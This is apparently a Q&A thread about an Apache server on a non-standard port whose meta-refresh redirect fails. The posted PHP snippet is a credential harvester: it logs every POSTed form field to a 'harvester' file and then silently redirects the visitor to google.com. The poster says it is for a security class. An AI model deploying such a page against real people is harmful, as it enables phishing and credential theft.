# Apache server php port issues

Tags: php, apache, web-services, port

I am hosting an Apache server from my Linux laptop. Due to my ISP restricting my ability to host on port 80 I have hosted the server on port 8852. When I join the server everything works fine, however when I  click the button that activates the meta refresh tag it says

This webpage is not available ERR_CONNECTION_REFUSED

All it is supposed to do is refresh to google.com but for some reason it does that.

```
<?php $file = 'harvester_2015-05-14 17:51:59.186240.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://www.google.com" />
```

Comment: Can start by providing the code you use for this.

Comment: @Darren I added it. This is for my security class btw I know this may look fishy xD

Comment: Hrm, and what happens if you replace that meta refresh with a `<?php header("Location: http://www.google.com"); ?>`

Comment: @Darren the same error appears

Comment: @Darren when I host the apache2 server on port 80 everything works as it should but for some reason it does not on port 8852

Comment: Have you restarted your apache?

Comment: @Darren Yes every time I make the slightest change

Comment: Unlike forum sites, we don't use "Thanks", or "Any help appreciated", or signatures on [so]. See "[Should 'Hi', 'thanks,' taglines, and salutations be removed from posts?](http://meta.stackexchange.com/questions/2950/should-hi-thanks-taglines-and-salutations-be-removed-from-posts).

Comment: Sorry I'll be sure to refrain from it in the future @JohnSaunders